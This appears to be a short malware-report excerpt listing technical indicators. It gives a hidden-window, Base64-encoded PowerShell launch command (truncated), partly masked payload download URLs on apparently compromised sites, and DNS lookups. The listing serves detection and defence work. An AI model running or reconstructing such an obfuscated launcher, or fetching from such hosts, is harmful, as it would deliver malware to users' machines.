Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABDAGsAcABjAHEAYwBiAGgAcgA9ACcARwB0AHcAYwBiAHEAYwBwACcAOwAkAFkAYQB6AGoAZQB0AGYAaQB0AHEAIAA9ACAAJwA5ADMAMAAnADsAJABBAHoAaABlAGMAbgB1AGYAdwBoAD0AJwBNAG0AYgBxAG4...
- http://www.hi#####stetica.com.br/edhlnz/8JUfG9q/
- http://me###asarim.com/wp-admin/qvuqz/
- DNS ASK hi#####stetica.com.br
- DNS ASK me###asarim.com
- DNS ASK co#####ianzgilling.com
- DNS ASK ad######.bengalgroup.com
- DNS ASK cl####olutionow.com